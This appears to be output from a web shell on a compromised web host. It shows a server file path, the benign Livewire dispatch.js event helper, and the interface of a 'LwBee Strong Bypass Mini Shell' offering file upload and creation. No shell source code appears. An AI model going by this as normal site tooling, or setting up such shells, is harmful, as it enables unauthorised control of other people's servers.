/home/storage/f/3f/a5/aloic1/public_html/core/vendor/livewire/livewire/js/util/dispatch.js
export function dispatch(eventName) {
    const event = document.createEvent('Events')

    event.initEvent(eventName, true, true)

    document.dispatchEvent(event)

    return event
}
@LwBee Strong Bypass

LwBee Strong Bypass Mini Shell

Upload File

Create New File